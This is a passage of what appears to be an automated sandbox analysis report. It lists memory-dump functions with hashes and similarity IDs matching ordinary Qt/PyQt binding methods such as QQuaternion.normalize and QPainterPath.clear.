                                                                                                                                                                                                                                          • Instruction ID: 4cb1d37d12e814526c258f4f133d330f526d6df58bd472043a3174827836bfaa
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cada4c10d51697eae09278391e6f499017bc0fb5d0ab38c45172874949b078b5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5010C76A08B4AD1EB108F15E8896A933A4FB54FD4F918432DA9E03330EF7DE55AC344
                                                                                                                                                                                                                                          Function 00007FF89D9B3D40 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?normalize@Quaternion@@
                                                                                                                                                                                                                                          • String ID: QQuaternion$normalize$normalize(self)
                                                                                                                                                                                                                                          • API String ID: 2138399658-1567478307
                                                                                                                                                                                                                                          • Opcode ID: c25daf945695b95002e533e0bc4ff6a68738ef6d4053f3c136a98db885c97653
                                                                                                                                                                                                                                          • Instruction ID: 209cfbb156e77bfe7be390cd5a6d2efa03753976a204c4d0546f17645bd6b418
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c25daf945695b95002e533e0bc4ff6a68738ef6d4053f3c136a98db885c97653
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA01E976A08B4AD1EB20CF51E8896A933A4FB44FD4F914032DA8E03320EF7DE55AC344
                                                                                                                                                                                                                                          Function 00007FF89D961D50 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?cancel@Manager@@Session
                                                                                                                                                                                                                                          • String ID: QSessionManager$cancel$cancel(self)
                                                                                                                                                                                                                                          • API String ID: 2497595591-1928775329
                                                                                                                                                                                                                                          • Opcode ID: 512c3fdde8e8df44e63be66183acb02c20dbd308cb2f163f1bc8ffa3616b837c
                                                                                                                                                                                                                                          • Instruction ID: 1626045166371aa2896c77fbbb757ee3f9f749478e44c4c79856251836828a90
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 512c3fdde8e8df44e63be66183acb02c20dbd308cb2f163f1bc8ffa3616b837c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44010C76A08A46D1EB108F11E8896A933B4FB54FD4F914032DA9E43330EF7DE56AC344
                                                                                                                                                                                                                                          Function 00007FF89D957F90 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FromLongLong_Unsigned
                                                                                                                                                                                                                                          • String ID: QPixelFormat$yellowSize$yellowSize(self) -> int
                                                                                                                                                                                                                                          • API String ID: 3417993445-1855945841
                                                                                                                                                                                                                                          • Opcode ID: d1d026f33e6f52d6689f92b7680a0c7de75ace86ee87d572ea93ca2cf876744a
                                                                                                                                                                                                                                          • Instruction ID: 17c7665b27cf0a97dd19e0e3d98f460ed860dcb3fbf41c55565d040f547b3591
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d1d026f33e6f52d6689f92b7680a0c7de75ace86ee87d572ea93ca2cf876744a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D012C37A08B86D2EB10DF64E8496A933A4FB44F94F914032DA9E07320EF7CE659C744
                                                                                                                                                                                                                                          Function 00007FF89D9AFFE0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?clear@PainterPath@@
                                                                                                                                                                                                                                          • String ID: QPainterPath$clear$clear(self)
                                                                                                                                                                                                                                          • API String ID: 3640657333-838751274
                                                                                                                                                                                                                                          • Opcode ID: 120f90b1bbaed5862c67495ae71e4ec66c86e47f16c95164ae550b63e61d5bfb
                                                                                                                                                                                                                                          • Instruction ID: 6f224ca2033b562b82574a18f2b03ed403a87280727cdd06df649b4d71be48af
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 120f90b1bbaed5862c67495ae71e4ec66c86e47f16c95164ae550b63e61d5bfb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E801E976A08A4AD1EB10CF11E8896A933A4FB54FD4F914432DA8E03320EF7DE55AC344
                                                                                                                                                                                                                                          Function 00007FF89D947F80 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 30COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FromLongLong_
                                                                                                                                                                                                                                          • String ID: QPolygon$size$size(self) -> int
                                                                                                                                                                                                                                          • API String ID: 2938811853-4270133733
                                                                                                                                                                                                                                          • Opcode ID: e55a661093e2a40203f03b537055c5fec65fa7ffb7e5bf3865f5e0c7259b5645
                                                                                                                                                                                                                                          • Instruction ID: f51504a3cd26e5e496101dcc6f854eb3502c9b8282edad403e6274d2ea066a7c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e55a661093e2a40203f03b537055c5fec65fa7ffb7e5bf3865f5e0c7259b5645
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B010C36A05A4AC1DB10CF11E8896A933A4FB44F94F914032DA8E03320EF7DE559C784
                                                                                                                                                                                                                                          Function 00007FF89D953EC0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 29COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DoubleFloat_From
                                                                                                                                                                                                                                          • String ID: QTransform$m33$m33(self) -> float
                                                                                                                                                                                                                                          • API String ID: 329246742-641805950
                                                                                                                                                                                                                                          • Opcode ID: f462ca49106197281401547acff94f0986ba2e7941377120d25fa72e1d5ad1d5
                                                                                                                                                                                                                                          • Instruction ID: caad999819366d19ffe03a7bea964ed8d2902fd66446cc2646b5a53931f2334b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f462ca49106197281401547acff94f0986ba2e7941377120d25fa72e1d5ad1d5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F011A36A08F46D1EB10DF65E8496A933A4FB44BD4F918032DA9E03320EF7DEA59C344
                                                                                                                                                                                                                                          Function 00007FF89D98C000 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setDefaultFormat@Format@@SurfaceV1@@
                                                                                                                                                                                                                                          • String ID: QSurfaceFormat$setDefaultFormat$setDefaultFormat(format: QSurfaceFormat)
                                                                                                                                                                                                                                          • API String ID: 917215825-526822657
                                                                                                                                                                                                                                          • Opcode ID: 4d6aae18cff6c263698ee678d931226eb1ed501da37811969cc8a527e470f1d9
                                                                                                                                                                                                                                          • Instruction ID: df6f5096ab99f300b52527a1d798da7518367701365a2d98e1f565aee3f51024
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d6aae18cff6c263698ee678d931226eb1ed501da37811969cc8a527e470f1d9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A01A176A08A86D1EA209F51E8452A573B0FB94FD4F804032E98E57734EF7CF159C748
                                                                                                                                                                                                                                          Function 00007FF89D953E40 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 23COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
